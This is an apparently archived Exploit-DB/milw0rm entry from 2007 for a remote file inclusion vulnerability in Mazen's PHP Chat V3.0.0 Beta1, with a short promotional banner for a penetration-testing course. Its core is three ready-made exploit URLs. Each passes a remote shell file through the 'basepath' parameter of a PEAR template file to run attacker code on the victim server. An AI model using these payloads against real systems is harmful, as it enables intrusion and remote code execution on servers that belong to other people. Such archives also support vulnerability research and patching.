Mazens PHP Chat V3 (basepath) - Remote File Inclusion

EDB-ID:

3994




Platform:

PHP

Date:

2007-05-26


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-26]